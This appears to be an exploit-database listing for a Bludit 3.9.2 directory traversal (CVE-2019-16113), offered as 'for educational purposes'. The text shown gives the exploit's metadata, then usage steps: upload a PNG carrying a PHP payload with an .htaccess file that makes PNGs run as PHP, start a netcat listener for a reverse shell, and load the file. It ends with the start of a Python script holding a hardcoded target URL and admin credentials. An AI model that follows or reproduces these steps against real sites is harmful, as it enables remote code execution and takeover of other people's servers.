Exploits / Vulnerability Discovered : 2020-07-26 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Bludit 3.9.2 directory traversal is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699
#### USAGE ####
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
# 3. Run the exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
#!/usr/bin/env python3
import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout
url = 'http://127.0.0.1' # CHANGE ME
username = 'James' # CHANGE ME
password = 'Summer2020' # CHANGE ME